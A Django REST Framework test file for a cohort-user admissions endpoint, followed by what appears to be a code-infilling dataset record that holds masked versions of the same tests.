self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_without_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True)
url = reverse_lazy('admissions:cohort_id_user_id',
kwargs={
'cohort_id': model.cohort.id,
'user_id': model.user.id
})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_with_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=True)
url = reverse_lazy('admissions:cohort_id_user_id',
kwargs={
'cohort_id': model.cohort.id,
'user_id': model.user.id
})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True,
cohort=True,
user=True,
specialty_mode=True,
profile_academy=True,
cohort_user=True)
model_dict = self.get_cohort_user_dict(1)
url = reverse_lazy('admissions:cohort_id_user_id',
kwargs={
'cohort_id': model.cohort.id,
'user_id': model.user.id
})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.put(url, data)
json = response.json()
expected = {
'id': model.cohort_user.id,
'role': model.cohort_user.role,
'educational_status': model.cohort_user.educational_status,
'finantial_status': model.cohort_user.finantial_status,
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.count_cohort_user(), 1)
self.assertEqual(self.get_cohort_user_dict(1), model_dict)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True,
cohort=True,
user=True,
specialty_mode=True,
profile_academy=True,
cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id',
kwargs={
'cohort_id': model.cohort.id,
'user_id': 9999
})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True,
cohort=True,
user=True,
specialty_mode=True,
profile_academy=True,
cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id',
kwargs={
'cohort_id': 9999,
'user_id': model.user.id
})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True,
cohort=True,
user=True,
specialty_mode=True,
profile_academy=True,
cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id',
kwargs={
'cohort_id': model.cohort.id,
'user_id': model.user.id
})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(self.count_cohort_user(), 0)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_task(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True,
cohort=True,
user=True,
profile_academy=True,
cohort_user=True,
task=True,
task_status='PENDING',
task_type='PROJECT')
url = reverse_lazy('admissions:cohort_id_user_id',
kwargs={
'cohort_id': model.cohort.id,
'user_id': model.user.id
})
data = {
'educational_status': 'GRADUATED',
}
response = self.client.put(url, data)
json = response.json()
expected = {
'status_code': 400,
'detail': 'User has tasks with status pending the educational status cannot be GRADUATED',
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True,
cohort=True,
user=True,
profile_academy=True,
cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id',
kwargs={
'cohort_id': model.cohort.id,
'user_id': model.user.id
})
data = {
'educational_status': 'GRADUATED',
'finantial_status': 'LATE',
}
response = self.client.put(url, data)
json = response.json()
expected = {
'status_code': 400,
'detail': 'Cannot be marked as `GRADUATED` if its financial status is `LATE`',
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
|
flexible
|
{
"blob_id": "937711546271c145d0f0df2981bdd7d1e9297e3a",
"index": 3788,
"step-1": "<mask token>\n\n\nclass CohortIdUserIdTestSuite(AdmissionsTestCase):\n <mask token>\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_without_auth(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n response = self.client.get(url)\n json = response.json()\n self.assertEqual(json, {'detail':\n 'Authentication credentials were not provided.', 'status_code':\n status.HTTP_401_UNAUTHORIZED})\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid cohort_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n <mask token>\n <mask token>\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_without_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_with_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n model_dict = self.get_cohort_user_dict(1)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'id': model.cohort_user.id, 'role': model.cohort_user.\n role, 'educational_status': model.cohort_user.\n educational_status, 'finantial_status': model.cohort_user.\n finantial_status}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(self.count_cohort_user(), 1)\n self.assertEqual(self.get_cohort_user_dict(1), model_dict)\n <mask token>\n <mask token>\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(self.count_cohort_user(), 0)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_task(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True, task=True,\n task_status='PENDING', task_type='PROJECT')\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'User has tasks with status pending the educational status cannot be GRADUATED'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Cannot be marked as `GRADUATED` if its financial status is `LATE`'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n",
"step-2": "<mask token>\n\n\nclass CohortIdUserIdTestSuite(AdmissionsTestCase):\n <mask token>\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_without_auth(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n response = self.client.get(url)\n json = response.json()\n self.assertEqual(json, {'detail':\n 'Authentication credentials were not provided.', 'status_code':\n status.HTTP_401_UNAUTHORIZED})\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid cohort_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': 999})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid user_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_without_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_with_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n model_dict = self.get_cohort_user_dict(1)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'id': model.cohort_user.id, 'role': model.cohort_user.\n role, 'educational_status': model.cohort_user.\n educational_status, 'finantial_status': model.cohort_user.\n finantial_status}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(self.count_cohort_user(), 1)\n self.assertEqual(self.get_cohort_user_dict(1), model_dict)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': 9999})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 9999, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(self.count_cohort_user(), 0)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_task(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True, task=True,\n task_status='PENDING', task_type='PROJECT')\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'User has tasks with status pending the educational status cannot be GRADUATED'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Cannot be marked as `GRADUATED` if its financial status is `LATE`'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n",
"step-3": "<mask token>\n\n\nclass CohortIdUserIdTestSuite(AdmissionsTestCase):\n \"\"\"Test /cohort/:id/user/:id\"\"\"\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_without_auth(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n response = self.client.get(url)\n json = response.json()\n self.assertEqual(json, {'detail':\n 'Authentication credentials were not provided.', 'status_code':\n status.HTTP_401_UNAUTHORIZED})\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid cohort_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': 999})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid user_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_without_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_with_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n model_dict = self.get_cohort_user_dict(1)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'id': model.cohort_user.id, 'role': model.cohort_user.\n role, 'educational_status': model.cohort_user.\n educational_status, 'finantial_status': model.cohort_user.\n finantial_status}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(self.count_cohort_user(), 1)\n self.assertEqual(self.get_cohort_user_dict(1), model_dict)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': 9999})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n 